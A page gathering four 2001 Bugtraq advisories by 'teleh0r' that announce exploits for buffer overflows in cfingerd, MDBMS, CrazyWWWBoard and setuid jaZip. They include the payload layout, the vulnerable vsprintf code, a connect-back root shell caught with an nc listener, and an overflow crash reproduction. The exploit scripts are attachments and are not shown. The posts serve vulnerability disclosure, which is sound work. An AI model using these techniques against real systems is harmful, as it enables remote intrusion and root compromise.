Another exploit for cfingerd = 1.4.3-8

2001-07-11 Thread teleh0r 

Dear bugtraq readers,

This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844

In order to allow for more nops, I have constructed the payload
like this:

82 nopsjmp 0x4retaddrshellcode

[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xb46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#

Tested against cfingerd 1.4.3-8.

Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
 cfingerd-exploit.pl

Remote buffer overflow in MDBMS.

2001-06-13 Thread teleh0r - 


Dear bugtraq readers,
 
MDBMS is a SQL database server (currently) for UNIX systems.
Version 0.99b9 and below versions contain an exploitable
buffer overflow in the handling of the \s console command.
 
When a user passes large buffers to the server in the form
of multiple lines, these are appended to the end of each
other. A subsequent call to the \s command causes the
overflow.
 
Below is faulty code (from interface.cc):
 
void user::uprintf(char *s, ...)
{
  char b[1];
  int len=strlen(outbuf), newlen;
  va_list ap;
  va_start(ap,s);
  vsprintf(b,s,ap); 
  va_end(ap);
  newlen=strlen(b);
  while (newlen+len+10=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
  strcat(outbuf,b);
  FD_SET(fd,parent-wmask);
}
 
mu-b also found a buffer overflow in the create database
system. This was actually caused by a sprintf that generated
the name of the management variable. This has been fixed -
now table and database names can no longer be larger than
128 bytes.
 
Information about the overflows was sent to [EMAIL PROTECTED]
He has now fixed the problems, and new versions of MDBMS can
be found at: http://www.hinttech.com/mdbms/
 
We would like to thank Marty for kind response and quick update.
 
Exploit example:

 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
 
-- Remote code execution exploit - MDBMS = 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
 
Usage: ./mdbms-pms.pl -t hostname -b back
 
 -t hostname: hostname to test
 -b back: connect back to ip
 -p port: port (default: 2223)
 -d delay   : delay before timeout
 -o offset  : offset
 -h   : return to heap
 
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 
[1] 2070
listening on [any] 1337 ...
 
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
 
-- Remote code execution exploit - MDBMS = 0.99b
-- [EMAIL PROTECTED] - Copyright (c) 2001
 
- Connected to: 127.1 / MDBMS V0.99b9 ready.
- Address : 0x302027d / xor-mask: 0x2020202
- Return  : 0x80cfe76 / using the heap ...
- Sending payload: ...
 
- * Successfully sent payload - good luck!
 
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
 
Exploit code attached.
 
Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
 -- Elbert Hubbard
 mdbms.tar.gz

Remote buffer overflow in CrazyWWWBoard.

2001-03-31 Thread teleh0r 

Dear, Bugtraq

"Just little bits of history repeating"

I have discovered a buffer overflow in CrazyWWWBoard Full Edition 
CrazyWWWBoard Limited Edition.

This is NOT that same overflow as discovered by Jin Ho You, 01.30.2001
(http://www.securityfocus.com/archive/1/159387)

This overflow will allow for arbitrary code execution with the privileges of
the web server. The versions which have been tested are:
CrazyWWWBoard2000p4 for RedHat 6.0 and CrazyWWWBoard2000LEp5 for
RedHat 6.1.

Proof of Concept exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
 crazywwwb-exploit.pl

Vulnerability in jaZip.

2001-01-15 Thread teleh0r 

Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xb7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
 jazip-exploit.pl